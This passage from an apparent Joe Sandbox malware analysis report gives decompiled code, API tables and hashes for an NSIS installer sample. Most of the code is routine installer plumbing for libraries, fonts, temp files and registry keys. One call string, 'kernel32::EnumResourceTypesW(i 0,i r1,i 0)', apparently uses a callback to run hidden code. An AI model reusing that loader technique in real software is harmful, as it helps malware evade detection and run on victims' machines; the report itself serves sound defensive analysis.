					__esi = E00402E92(__edx, 0xfffffff0);
					_a68 = __esi;
					__edi = E00402E92(__edx, 1);
					_a60 = __edi;
					if(_a48 == __ebx) {
						L5:
						__eax = LoadLibraryExA(__esi, __ebx, 8); // executed
						__esi = __eax;
						if(__esi == 0) {
							_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
							_push(0xfffffff6);
							L1:
							E00405BA4();
							goto L18;
						} else {
							goto L6;
						}
					} else {
						__eax = GetModuleHandleA(__esi); // executed
						__esi = __eax;
						if(__esi != 0) {
							L6:
							__edi = GetProcAddress(__esi, __edi);
							if(__edi == 0) {
								_push(_a68);
								_push(0xfffffff7);
								__eax = E00405BA4();
								goto L12;
							} else {
								_a16 = __ebx;
								if(_a48 == __ebx) {
									__eax =  *(__esp + 0x14);
									__eax =  *__edi(__eax, 0x400, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40a0e0, 0x40a000);
									__esp = __esp + 0x14;
									goto L12;
								} else {
									_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
									_push(_a48);
									__eax = E00405BA4();
									if( *__edi() == 0) {
										L12:
										__eax = _a16;
									} else {
										__eax = __ebp;
										_a16 = __ebp;
									}
								}
							}
							if( *((intOrPtr*)(__esp + 0x34)) == __ebx) {
								if(E00403C08(__esi) != 0) {
									__eax = FreeLibrary(__esi);
								}
								L18:
								_t16 = _a16;
							}
						} else {
							__esi =  *(__esp + 0x48);
							goto L5;
						}
					}
				}
				 *0x4240c8 =  *0x4240c8 + _t16;
				return 0;
			}





                                                                                                                                                                                            0x0040220e
                                                                                                                                                                                            0x00402218
                                                                                                                                                                                            0x004022f4
                                                                                                                                                                                            0x004022f9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040221e
                                                                                                                                                                                            0x00402225
                                                                                                                                                                                            0x00402228
                                                                                                                                                                                            0x00402231
                                                                                                                                                                                            0x00402233
                                                                                                                                                                                            0x0040223b
                                                                                                                                                                                            0x0040224e
                                                                                                                                                                                            0x00402252
                                                                                                                                                                                            0x00402258
                                                                                                                                                                                            0x0040225c
                                                                                                                                                                                            0x004022e8
                                                                                                                                                                                            0x004022ed
                                                                                                                                                                                            0x004015f3
                                                                                                                                                                                            0x004015f3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040223d
                                                                                                                                                                                            0x0040223e
                                                                                                                                                                                            0x00402244
                                                                                                                                                                                            0x00402248
                                                                                                                                                                                            0x00402262
                                                                                                                                                                                            0x00402269
                                                                                                                                                                                            0x0040226d
                                                                                                                                                                                            0x004022b5
                                                                                                                                                                                            0x004022b9
                                                                                                                                                                                            0x004022bb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040226f
                                                                                                                                                                                            0x0040226f
                                                                                                                                                                                            0x00402277
                                                                                                                                                                                            0x00402295
                                                                                                                                                                                            0x004022ae
                                                                                                                                                                                            0x004022b0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402279
                                                                                                                                                                                            0x00402279
                                                                                                                                                                                            0x0040227e
                                                                                                                                                                                            0x00402282
                                                                                                                                                                                            0x0040228b
                                                                                                                                                                                            0x004022c0
                                                                                                                                                                                            0x004022c0
                                                                                                                                                                                            0x0040228d
                                                                                                                                                                                            0x0040228d
                                                                                                                                                                                            0x0040228f
                                                                                                                                                                                            0x0040228f
                                                                                                                                                                                            0x0040228b
                                                                                                                                                                                            0x00402277
                                                                                                                                                                                            0x004022c8
                                                                                                                                                                                            0x004022d6
                                                                                                                                                                                            0x004022dd
                                                                                                                                                                                            0x004022dd
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x0040224a
                                                                                                                                                                                            0x0040224a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040224a
                                                                                                                                                                                            0x00402248
                                                                                                                                                                                            0x0040223b
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040223E
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405BD9
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrlenA.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405BE9
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405C02
                                                                                                                                                                                              • Part of subcall function 00405BA4: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll), ref: 00405C1D
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32 ref: 00405C47
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32(000203D0,00001007,00000000,?), ref: 00405C64
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32(000203D0,00001013,00000000,00000000), ref: 00405C72
                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402252
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00402264
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004022DD
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                                                                                                                                                            • API String ID: 2987980305-989016385
                                                                                                                                                                                            • Opcode ID: 7bfa0cb9ced90888c2b41ffef340ded9348342eb2cc6b28df5f9389f455cb846
                                                                                                                                                                                            • Instruction ID: a654396c40926d98d865d66058fbdccd7abebda15d1418ecb70caed1ab6f9dd9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bfa0cb9ced90888c2b41ffef340ded9348342eb2cc6b28df5f9389f455cb846
                                                                                                                                                                                            • Instruction Fuzzy Hash: 04210B31548711A7C721EF548E05A1F7690BF80711F21463FF951B62D0DBBCD9019A6F
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00401F76 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                            			E00401F76(struct HWND__* __edx, struct HWND__* _a12, intOrPtr _a36, signed char _a48) {
				void* _v12;
				int _t6;
				intOrPtr _t12;
				struct HFONT__* _t18;
				intOrPtr _t20;
				signed char _t25;
				struct HDC__* _t28;
				void* _t34;

				_t28 = GetDC(__edx);
				_t6 = E00402E56(2);
				0x40b4e8->lfHeight =  ~(MulDiv(_t6, GetDeviceCaps(_t28, 0x5a), 0x48));
				ReleaseDC(_a12, _t28);
				_t12 = E00402E56(3);
				_t25 = _a48;
				_push(_a36);
				 *0x40b4f8 = _t12;
				 *0x40b4ff = 1;
				 *0x40b4fc = _t25 & 0x00000001;
				_push("Tahoma");
				 *0x40b4fd = _t25 & 0x00000002;
				 *0x40b4fe = _t25 & 0x00000004;
				E00405D47();
				_t18 = CreateFontIndirectA(0x40b4e8); // executed
				_push(_t18);
				E00406408();
				_t20 =  *((intOrPtr*)(_t34 + 0x10));
				 *0x4240c8 =  *0x4240c8 + _t20;
				return 0;
			}











                                                                                                                                                                                            0x00401f7f
                                                                                                                                                                                            0x00401f81
                                                                                                                                                                                            0x00401f9e
                                                                                                                                                                                            0x00401fa9
                                                                                                                                                                                            0x00401fb1
                                                                                                                                                                                            0x00401fb7
                                                                                                                                                                                            0x00401fbb
                                                                                                                                                                                            0x00401fbf
                                                                                                                                                                                            0x00401fc8
                                                                                                                                                                                            0x00401fcf
                                                                                                                                                                                            0x00401fdb
                                                                                                                                                                                            0x00401fe0
                                                                                                                                                                                            0x00401fe5
                                                                                                                                                                                            0x00401feb
                                                                                                                                                                                            0x00401ff5
                                                                                                                                                                                            0x00401acb
                                                                                                                                                                                            0x0040169c
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetDC.USER32 ref: 00401F77
                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401F8E
                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401F96
                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401FA9
                                                                                                                                                                                              • Part of subcall function 00405D47: lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405BD7,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,C:\Users\user\Desktop,?,00000000), ref: 00405F22
                                                                                                                                                                                            • CreateFontIndirectA.GDI32(0040B4E8), ref: 00401FF5
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                                                                                                                                                                            • String ID: Tahoma
                                                                                                                                                                                            • API String ID: 4253744674-3580928618
                                                                                                                                                                                            • Opcode ID: 694a9c6ed0a6495e05b4a5c730603a1d66e2e27d01218feb7250a32d56d2bee5
                                                                                                                                                                                            • Instruction ID: a067ea633b78dc0106bed75bd08f7ff4db8ae7a87cf48f5c40473434dfad3ef5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 694a9c6ed0a6495e05b4a5c730603a1d66e2e27d01218feb7250a32d56d2bee5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F01F271140342AFD3109B75AF0AF463BA4EB55700F10483EF255B72E2CB78420A9F6D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040604A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1065 40604a-40606a GetSystemDirectoryA 1066 406084 1065->1066 1067 40606c-40606e 1065->1067 1069 40608a 1066->1069 1067->1066 1068 406070-40607b 1067->1068 1068->1069 1071 40607d-406082 1068->1071 1070 40608f-4060b4 wsprintfA LoadLibraryExA 1069->1070 1071->1070
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E0040604A(intOrPtr _a4) {
				char _v292;
				int _t9;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				void* _t14;
				void* _t18;

				_t9 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t9 > 0x104 || _t9 == 0) {
					_t10 =  &_v292;
					goto L5;
				} else {
					_t10 = _t18 + _t9 - 0x120;
					if( *((char*)(_t10 - 1)) == 0x5c) {
						L5:
						_t14 = 0x408299;
					} else {
						_t14 = 0x408298;
					}
				}
				wsprintfA(_t10, "%s%s.dll", _t14, _a4);
				_t13 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t13;
			}









                                                                                                                                                                                            0x00406061
                                                                                                                                                                                            0x0040606a
                                                                                                                                                                                            0x00406084
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406070
                                                                                                                                                                                            0x00406070
                                                                                                                                                                                            0x0040607b
                                                                                                                                                                                            0x0040608a
                                                                                                                                                                                            0x0040608a
                                                                                                                                                                                            0x0040607d
                                                                                                                                                                                            0x0040607d
                                                                                                                                                                                            0x0040607d
                                                                                                                                                                                            0x0040607b
                                                                                                                                                                                            0x00406099
                                                                                                                                                                                            0x004060ad
                                                                                                                                                                                            0x004060b4

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406061
                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406099
                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060AD
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                            • String ID: %s%s.dll$UXTHEME
                                                                                                                                                                                            • API String ID: 2200240437-4069249669
                                                                                                                                                                                            • Opcode ID: 85ff7145cdd1a3d9bdb029925ff7ebdc07d94a2906bd2e8a420a40c77d0e60d6
                                                                                                                                                                                            • Instruction ID: caf308547f1ee03ca887fbe9a1d46bad374a991ac45094995a59f03bdc810326
                                                                                                                                                                                            • Opcode Fuzzy Hash: 85ff7145cdd1a3d9bdb029925ff7ebdc07d94a2906bd2e8a420a40c77d0e60d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF02B705406086BD711D754DD0CFDA7BACEB08340F1441BAABC9F21C2DB78D9644B9C
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406851 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1072 406851-40685b 1073 40685c-406886 GetTickCount GetTempFileNameA 1072->1073 1074 406890 1073->1074 1075 406888-40688a 1073->1075 1077 406892-406895 1074->1077 1075->1073 1076 40688c-40688e 1075->1076 1076->1077
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406851(CHAR* _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				char _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t9 =  &_a4; // 0x61736e
					_t14 = GetTempFileNameA(_a8, _t9, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 = _t14;
					return _t14;
				}
				return _t20;
			}








                                                                                                                                                                                            0x00406855
                                                                                                                                                                                            0x0040685b
                                                                                                                                                                                            0x0040685c
                                                                                                                                                                                            0x0040685c
                                                                                                                                                                                            0x0040685d
                                                                                                                                                                                            0x00406864
                                                                                                                                                                                            0x0040686c
                                                                                                                                                                                            0x00406872
                                                                                                                                                                                            0x00406875
                                                                                                                                                                                            0x0040687e
                                                                                                                                                                                            0x00406886
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040688a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040688c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040688c
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00406864
                                                                                                                                                                                            • GetTempFileNameA.KERNELBASE(?,nsa,00000000,?), ref: 0040687E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406854
                                                                                                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406858
                                                                                                                                                                                            • nsa, xrefs: 00406875, 0040687A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                                                                                                                                            • API String ID: 1716503409-3664342310
                                                                                                                                                                                            • Opcode ID: 304440f0de66eb6abd850e63bdd7d78664a5c617f01e724e250225108a7b6ef9
                                                                                                                                                                                            • Instruction ID: b369e154df8caedb791ff8052512b5923ba08c6326dcb02456264c18af1b3135
                                                                                                                                                                                            • Opcode Fuzzy Hash: 304440f0de66eb6abd850e63bdd7d78664a5c617f01e724e250225108a7b6ef9
                                                                                                                                                                                            • Instruction Fuzzy Hash: B8F0A733309204BBD7105E55DC04BDA7B59EF91750F15C03FFA849A180D670995487A9
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82registryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1078 40141e-401456 call 40614a 1080 40145b-40145d 1078->1080 1081 401463-40146d 1080->1081 1082 401527-401530 1080->1082 1083 401493-4014a4 1081->1083 1084 40146f-401491 RegEnumValueA 1081->1084 1086 4014ce-4014d6 RegEnumKeyA 1083->1086 1084->1083 1085 401503-401512 RegCloseKey 1084->1085 1085->1082 1087 4014a6-4014a8 1086->1087 1088 4014d8-4014eb RegCloseKey call 4066e5 1086->1088 1087->1085 1090 4014aa-4014c1 call 40141e 1087->1090 1094 401514-40151e 1088->1094 1095 4014ed-401501 RegDeleteKeyA 1088->1095 1090->1088 1096 4014c3-4014cd 1090->1096 1094->1082 1095->1082 1096->1086
                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                            			E0040141E(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v4;
				void* _v8;
				char _v264;
				int _v268;
				void* _v272;
				void* _v276;
				void* _v284;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t43;
				signed int _t45;

				_t45 = _a12 & 0x00000300;
				_t43 = _a12 & 0x00000001;
				_t27 = E0040614A(__eflags, _a4, _a8, _t45 | 0x00000009,  &_v272); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v264);
						_push(0);
						while(RegEnumKeyA(_v272, ??, ??, ??) == 0) {
							__eflags = _t43;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v272);
								return 0x3eb;
							}
							_t33 = E0040141E(__eflags, _v272,  &_v264, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v264);
							_push(_t43);
						}
						RegCloseKey(_v272);
						_t35 = E004066E5(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t45, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v268 = 0;
					if(RegEnumValueA(_v272, 0,  &_v264,  &_v268, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}















                                                                                                                                                                                            0x00401438
                                                                                                                                                                                            0x00401441
                                                                                                                                                                                            0x00401456
                                                                                                                                                                                            0x0040145d
                                                                                                                                                                                            0x0040146d
                                                                                                                                                                                            0x00401493
                                                                                                                                                                                            0x00401493
                                                                                                                                                                                            0x0040149c
                                                                                                                                                                                            0x0040149d
                                                                                                                                                                                            0x004014ce
                                                                                                                                                                                            0x004014a6
                                                                                                                                                                                            0x004014a8
                                                                                                                                                                                            0x00401503
                                                                                                                                                                                            0x00401507
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040150d
                                                                                                                                                                                            0x004014ba
                                                                                                                                                                                            0x004014bf
                                                                                                                                                                                            0x004014c1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004014c3
                                                                                                                                                                                            0x004014cc
                                                                                                                                                                                            0x004014cd
                                                                                                                                                                                            0x004014cd
                                                                                                                                                                                            0x004014dc
                                                                                                                                                                                            0x004014e4
                                                                                                                                                                                            0x004014eb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00401525
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004014fb
                                                                                                                                                                                            0x00401477
                                                                                                                                                                                            0x00401491
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00401491
                                                                                                                                                                                            0x00401530

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 004014FB
                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401507
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                                            • Opcode ID: 4db4b88a92d89516e7b30aa637e46b3ee5fd13fca29ce1b59d132736ad74e021
                                                                                                                                                                                            • Instruction ID: 2adc47aafbc586f84a9ead2a05f8f25a1268aec79d6f2a677e480215e0f056ab
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4db4b88a92d89516e7b30aa637e46b3ee5fd13fca29ce1b59d132736ad74e021
                                                                                                                                                                                            • Instruction Fuzzy Hash: 57218032108244BBD7229F51DD00FEFBBEDEB99358F01083AF9C5A10B0D7359A249A5A
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040264F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76registrystringCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1097 40264f-40269c call 402e92 * 2 call 402e77 call 406117 1106 4026a2-4026ad 1097->1106 1107 402cfc-402d12 1097->1107 1108 4026c1-4026c6 1106->1108 1109 4026af-4026bf call 402e92 lstrlenA 1106->1109 1113 4026d7-4026dc 1108->1113 1114 4026c8-4026d5 call 402e56 1108->1114 1118 4026f0-402711 RegSetValueExA RegCloseKey 1109->1118 1113->1118 1119 4026de-4026ee call 4030d6 1113->1119 1114->1118 1118->1107 1119->1118
                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                            			E0040264F(intOrPtr _a8, void* _a24, void* _a36, void* _a48, intOrPtr _a52, intOrPtr _a56, int _a60, intOrPtr _a64, int _a76) {
				void* _v12;
				void* _t20;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t26;
				int _t33;
				void* _t38;
				void* _t40;
				void* _t42;
				int _t48;
				void* _t49;
				void* _t51;

				_a64 = _a56;
				_a76 = _a60;
				_a76 = E00402E92(_t38, 2);
				_t20 = E00402E92(_t38, 0x11);
				_a8 = 1;
				E00406117(_t51, E00402E77(_t42), _t20, 0x100022,  &_a76); // executed
